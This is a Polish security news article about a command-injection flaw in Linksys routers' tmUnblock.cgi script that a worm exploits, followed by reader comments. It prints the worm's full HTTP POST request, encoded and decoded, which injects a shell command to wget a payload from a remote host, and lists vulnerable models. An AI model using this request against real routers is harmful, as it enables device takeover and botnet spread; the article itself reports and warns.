17.02.2014 | 11:45

Adam Haertle

Poważny błąd w wielu modelach ruterów Linksysa

Chyba już nikogo nie zaskoczy fakt, że w domowych ruterach Linksysa wykryto kolejny poważny błąd, umożliwiający zdalne przejęcie całkowitej kontroli nad urządzeniem. Na dokładkę błąd używany jest przez robaka, skanującego internet.

Kilka dni temu opisaliśmy robaka, który atakuje rutery Linksysa za pomocą niezidentyfikowanego błędu i wykorzystuje je do szukania kolejnych ofiar. Od niedawna wiadomo, o jaki błąd chodzi.

Na czym polega atak

Odkryto, że nie dość, że jeden z parametrów skryptu obsługującego blokowanie i odblokowywanie stron dostępnych za pomocą rutera jest podatny na wstrzyknięcie dowolnego polecenia powłoki, to na dokładkę wykonanie tego skryptu odbywa się bez weryfikacji uprawnień użytkownika.

Przykładowy atak wygląda tak:

POST /tmUnblock.cgi HTTP/1.1
Host: 192.168.0.1:8080
User-Agent: Mozilla/4.0 (compatible; MSIE 4.01; Mac_PowerPC)
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.0.1:8080/
Authorization: Basic YWRtaW46JmkxKkBVJDZ4dmNH 
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 518

%73%75%62%6d%69%74%5f%62%75%74%74%6f%6e%3d&%63%68%61%6e%67%65%5f%61%63
%74%69%6f%6e%3d&%73%75%62%6d%69%74%5f%74%79%70%65%3d&%61%63%74%69%6f
%6e%3d&%63%6f%6d%6d%69%74%3d%30&%74%74%63%70%5f%6e%75%6d%3d%32&%74%74
%63%70%5f%73%69%7a%65%3d%32&%74%74%63%70%5f%69%70%3d%2d%68%20%60%63
%64%20%2f%74%6d%70%3b%69%66%20%5b%20%21%20%2d%65%20%2e%4c%32%36%20
%5d%3b%74%68%65%6e%20%77%67%65%74%20%68%74%74%70%3a%2f%2f%xx%xx%2e
%xx%xx%xx%2e%xx%xx%xx%2e%xx%xx%xx%3a%31%39%33%2f%30%52%78%2e%6d%69
%64%3b%66%69%60&%53%74%61%72%74%45%50%49%3d%31

Autoryzacja co prawda jest wymagana, jednak hasło podane przez użytkownika nie jest weryfikowane. Treść żądania musi być zakodowana, by nie zostać zniekształcona w trakcie przetwarzania, a po odkodowaniu wygląda tak:

submit_button=&change_action=&submit_type=&action=&commit=0&ttcp_num=2&ttcp_size=2
&ttcp_ip=-h
    `cd /tmp;if [ ! -e .L26 ];then wget http://192.168.0.1:193/0Rx.mid;fi`
&StartEPI=1

Powyższy przykład to fragment ataku wspominanego wcześniej robaka. Mamy zatem do czynienia z możliwością zdalnego wykonania kodu przez każdego użytkownika, który może połączyć się z interfejsem www rutera. Oznacza to, że na zdalny atak podatne są jedynie urządzenia, których witryna administracyjna jest publicznie dostępna w sieci. Rutery, które mają wyłączony dostęp zdalny, podatne są jedynie na atak lokalny i ich posiadacze w zasadzie mogą spać spokojnie.

Jeśli Wasz ruter Linksysa ze standardowym oprogramowaniem jest dostępny zdalnie, to zalecamy szybką zmianę tego ustawienia, ponieważ w sieci zostały już opublikowane przykładowe kody źródłowe exploitów.

Które urządzenia są podatne

Według naszej analizy urządzeń, które aktywnie prowadzą ataki, podatne są co najmniej poniższe modele i wersje oprogramowania:

  • E1000 2.1.01 build 5
  • E1200 1.0.00 build 11
  • E1200 2.0.04 build 1
  • E1200 2.0.05 build 2
  • E1200 2.0.06 build 6
  • E1500 1.0.01 build 4
  • E1500 1.0.04 build 2
  • E2500 1.0.01 build 3
  • E2500 1.0.03 build 4
  • E2500 1.0.04 build 1
  • E2500 1.0.05 build 1
  • E2500 1.0.05 build 2
  • E2500 1.0.07 build 1
  • E3200 1.0.00 build 13
  • E3200 1.0.01 build 3
  • E3200 1.0.03 build 9
  • E3200 1.0.04 build 1
  • E4200 1.0.02 build 13
  • E4200 1.0.04 build 11
  • E4200 1.0.05 build 7

Dodatkowo w kodzie robaka odnaleziono listę urządzeń, które próbuje infekować – jest ona dużo dłuższa i nie wiemy, czy wszystkie znajdujące się na niej modele są podatne. Oprócz modeli wymienionych powyżej mogą to także być:

  • E3000
  • E2100L
  • E2000
  • E1550
  • E900
  • E300
  • WAG320N
  • WAP300N
  • WAP610N
  • WES610N
  • WET610N
  • WRT610N
  • WRT600N
  • WRT400N
  • WRT320N
  • WRT160N
  • WRT150N

Jeśli Wasz ruter nie znajduje się na powyższej liście, to tak czy inaczej zalecamy wyłączenie zdalnego dostępu i zmianę hasła administratora.

Powrót

Komentarze

  • 2014.02.17 11:56 eeee

    Dobrze, że prują ostatnio tak te routery. To jednak ważna furtka do naszego bezpieczeństwa w Internecie i firmy powinny tworzyć oprogramowanie jak najwyższej jakości.

    Odpowiedz
    • 2014.02.17 12:53 wuko

      Dlatego warto używać alternatyw (Tomato, DD-WRT) – pod warunkiem, że pod dane routery został takowy przygotowany.

      Odpowiedz
      • 2014.02.17 14:25 eeee

        Tylko przeciętny użytkownik tego nie zrobi: a) nie potrafi b) będzie obawiał się utraty gwarancji, zepsuje itp. dlatego firmy powinny dokładać wszelkich starań, aby to łatać oraz uczulać użytkowników do sprawdzania czy na ich sprzęt wyszła nowsza wersja oprogramowania do wrzucenia przez 2 kliknięcia lub inny prosty sposób np. status update’ów na głównej stronie konfiguracji routera. Chociaż skoro kogo nie spytasz to nie pamięta/zna hasła do panelu zarządzania routerem, więc o czym my tu mówimy…

        Odpowiedz
  • 2014.02.17 14:11 Kuba

    „Rutery, które mają wyłączony dostęp zdalny, podatne są jedynie na atak lokalny i ich posiadacze w zasadzie mogą spać spokojnie” a co jeśli udostępniamy sieć publiczne? W pracy, szkole, prowadzimy wynajem pokoi i udostępniamy WIFI? Też możemy spać spokojnie?

    Odpowiedz
    • 2014.02.17 14:26 eeee

      Przez spać spokojnie, autor zapewne miał na myśli zwykłych użytkowników domowych, a oni powinni wiedzieć komu dają dostęp, a rotacja takich osób także chyba nie jest zbyt wielka, prawda :)?

      Odpowiedz
    • 2014.02.17 14:32 tomek

      Dla takich zastosowań, administratorzy / osoby opiekujące się siecią powinny wymóc na przełożonych zakupienie dedykowanego rutera, który będzie spełniał rolę sieci dla wszystkich. Sieć biurowa nie powinna być współdzielona. Dla mnie brak takiego podziału to trochę jak jazda gołą du*ą po nieoheblowanej desce…

      Odpowiedz
  • 2014.02.17 14:45 Tajniak_enesej

    Piszcie o linksysie a dajecie zdjęcia d-linka (posiadam taki więc rzuciło mi sie w oczy) a ja już zaczynałem testowanie :/

    Odpowiedz
    • 2014.02.17 14:55 Adam

      Słuszna uwaga, poprawione.

      Odpowiedz
  • 2014.02.17 18:19 Jakub Anderwald

    A patche jakies na to sa? I faktycznie routery powinny sie latwiej patchowac.

    Odpowiedz
  • 2014.02.17 18:33 JB

    MSIE 4.01; Mac_PowerPC ? kto tego jeszcze uzywa ?

    Odpowiedz
  • 2014.02.17 21:24 Maksymilian

    No i mamy piękny botnet dzięki temu błędowi

    http://thehackernews.com/2014/02/linksys-malware-moon-spreading-from.html

    Odpowiedz
    • 2014.02.17 21:29 Adam

      Było o nim u nas kilka dni temu ;)

      Odpowiedz
      • 2014.02.18 08:36 Maksymilian

        A to dopiero początek. Prawdziwa zabawa z routerami, dopiero się zaczyna. Biada tym co mają pootwierane porty…

        Odpowiedz

Zostaw odpowiedź do Adam

Jeśli chcesz zwrócić uwagę na literówkę lub inny błąd techniczny, zapraszamy do formularza kontaktowego. Reagujemy równie szybko.

Poważny błąd w wielu modelach ruterów Linksysa

Komentarze